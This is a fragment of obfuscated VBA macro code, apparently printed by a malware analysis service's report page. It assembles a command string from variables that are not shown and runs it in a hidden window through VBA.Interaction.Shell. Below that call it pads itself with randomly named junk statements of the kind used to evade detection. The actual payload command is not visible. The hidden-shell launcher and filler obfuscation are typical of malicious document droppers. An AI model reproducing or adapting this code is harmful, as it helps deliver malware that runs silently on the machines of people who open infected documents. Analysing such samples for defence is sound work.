  lIqyKAReSODOfKivEQUVOFPefuTaL = Join(Array(ViXpABOXaJawyBonyrOnoFU, mIGAXucAFmEteHOnAhAHViaEkYainiSAH, jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf), "")
  
  Call VBA.Interaction.Shell(lIqyKAReSODOfKivEQUVOFPefuTaL, (10 / 10) - 1)
Dim VomOOpUZAwoTYZixAVasOfOBEGOR(2)
Dim VomOOpUZAwoTYZixAVasOfOBEGOR_10(2)
If InStr(10, "hOvUmyZkUFO", "VomOOpUZAwoTYZixAVasOfOBEGOR") Then
  VomOOpUZAwoTYZixAVasOfOBEGOR(0) = InStrRev("hOvUmyZkUFO", "VomOOpUZAwoTYZixAVasOfOBEGOR")
  IsError CVErr(3068)
End If
IsError CVErr(1110)
If Len(Oct(3068)) > 10 Then
 VomOOpUZAwoTYZixAVasOfOBEGOR(1) = Hex(11 ^ 10)
End If
VomOOpUZAwoTYZixAVasOfOBEGOR_10(0) = Now
VarType IsNumeric(CInt("3068"))
VomOOpUZAwoTYZixAVasOfOBEGOR_10(1) = hOvUmyZkUFO & CStr("3068")

Dim vebanoiUneroCYpofdoQYCoLEzOPIqytoR(2)
Dim vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(2)
If InStr(10, "nAsUZitiGEaYr", "vebanoiUneroCYpofdoQYCoLEzOPIqytoR") Then
  vebanoiUneroCYpofdoQYCoLEzOPIqytoR(0) = InStrRev("nAsUZitiGEaYr", "vebanoiUneroCYpofdoQYCoLEzOPIqytoR")
  IsError CVErr(4717)
End If
IsError CVErr(1210)
If Len(Oct(4717)) > 10 Then
 vebanoiUneroCYpofdoQYCoLEzOPIqytoR(1) = Hex(12 ^ 10)
End If
vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(0) = Now
VarType IsNumeric(CInt("4717"))
vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(1) = nAsUZitiGEaYr & CStr("4717")
Dim QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(2)
Dim QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(2)
If InStr(10, "HOhONoxAvYqePORES", "QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi") Then
  QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(0) = InStrRev("HOhONoxAvYqePORES", "QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi")
  IsError CVErr(7626)
End If
IsError CVErr(1010)
If Len(Oct(7626)) > 10 Then
 QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(1) = Hex(10 ^ 10)
End If
QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(0) = Now
VarType IsNumeric(CInt("7626"))
QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(1) = HOhONoxAvYqePORES & CStr("7626")


End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.